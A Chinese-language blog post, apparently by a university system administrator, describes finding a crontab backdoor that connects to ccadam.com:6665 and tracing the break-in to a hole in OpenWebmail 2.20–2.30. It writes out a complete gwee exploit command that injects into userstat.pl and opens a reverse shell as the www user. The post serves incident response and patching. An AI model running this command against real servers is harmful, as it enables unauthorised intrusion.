我一開始是看到 www 這個使用者,一直有在執行 crontab,它會不斷的去呼叫 /var/spool/uucppublic/sh。
這顯然是一個後門程式,所謂的後門就是駭客入侵之後,為了避免當時用來入侵的漏洞被修補起來,所以打開的一道後門,供日後方便進出該機器。
[[MORE]]
我使用 lsof 去觀察這個檔案,及其開啟的檔案或者網路 port,發現它會連到這個地方:
ccadam.com:6665
因為最近很忙,所以一直沒有去注意最近被發表的漏洞,只知道駭客是利用網頁的服務進來的,可是本校的網頁實在太多,到底哪一隻程式出問題,其實也不曉得。只好先隨便猜測,然後找看看有沒有對應的 advisory。還好,沒有花太多時間就鎖定了一隻有漏洞的程式:openwebmail,也就是我們的網路郵局。
根據 Hackwire上的資料,有一個不錯的 exploit 工具:Gwee,可以幫助我去驗證這個漏洞。
gwee (Generic Web Exploitation Engine) is a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose.
要入侵具有漏洞的 openwebmail 系統,只需要下這個指令:
gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl
該程式會在 localhost 去 listen 31337 這個 port,然後傳回一個受害端的 shell,這個 shell 是以 www 的身份在執行的。
由於學生郵局有較嚴格的防火牆設定,所以這個工具沒辦法生效。(雖然還是有機會繞過防火牆來執行 exploit)但首頁用的主機我為了提供更高的效能,所以沒有架防火牆,因此成為目標。
現在已經將 openwebmail 都更新到最新版了。有漏洞的版本包括 OpenWebmail 2.20+ (2.20, 2.21, 2.30 confirmed) 。
駭客如果要找受害者,真的容易到了極點,不講太明了。
沒有留言:
張貼留言